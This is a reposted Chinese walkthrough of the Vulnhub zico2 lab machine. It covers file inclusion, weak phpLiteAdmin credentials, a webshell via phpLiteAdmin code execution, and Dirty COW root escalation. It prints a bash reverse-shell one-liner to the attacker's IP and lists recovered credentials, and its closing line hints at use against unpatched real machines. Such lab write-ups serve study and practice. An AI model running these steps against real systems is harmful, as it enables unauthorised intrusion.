脚本宝典收集整理的这篇文章主要介绍了Vulnhub靶场渗透-zico2,脚本宝典觉得挺不错的,现在分享给大家,也给大家做个参考。
靶机ip(192.168.110.128) 攻击机ip(192.168.110.127) 网络NAT模式
这段时间一直在忙别的事,有两个礼拜没有学习了,哈哈哈
LFI
,先记录下来肯定能用上 继续看就没有什么东西了,网页功能也比较简单,现在再来扫一下目录 很明显是数据库,手试了一波弱口令给我进去了,就是admin
简单说一下
phplITeadmin 其实就是一个类似于 phpmyadmin的一个数据库管理工具
注意他的版本,这个版本是存在 php远程代码执行漏洞的
-----参考链接----rootF1a;34kroot34
zico:zico2215@
尝试用 ssh 连接不行,会被检验
利用 phpliteadmin
写入一句话,正好可以利用最开始发现的文件包含来执行代码拿shell,就很舒服 数据库名我就叫 caiDAO.php
echo "bash -i >& /dev/tcp/192.168.110.127/2333 0>&1" | bash
URL编码一下直接弹 shell 在 zico 用户下发现 WordPress,打开配置文件发现了一串密码 再次尝试 ssh 连接成功了 查看系统内核,尝试脏牛提权,具体怎么提权就不多说了,都是常规操作,可以看看我的这篇文章 -----------脏牛提权-------- 这个时候 root 用户已经变成了我们这个 直接拿 flag
又是老套路了,拿到shell然后脏牛提权拿 root,可见脏牛有多出名 在实战中也还是有很多老机器是运行着旧版本的linux且没有打补丁,所以懂的都懂,哈哈哈
以上是脚本宝典为你收集整理的Vulnhub靶场渗透-zico2全部内容,希望文章能够帮你解决Vulnhub靶场渗透-zico2所遇到的问题。
本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
如您有任何意见或建议可联系处理。小编QQ:384754419,请注明来意。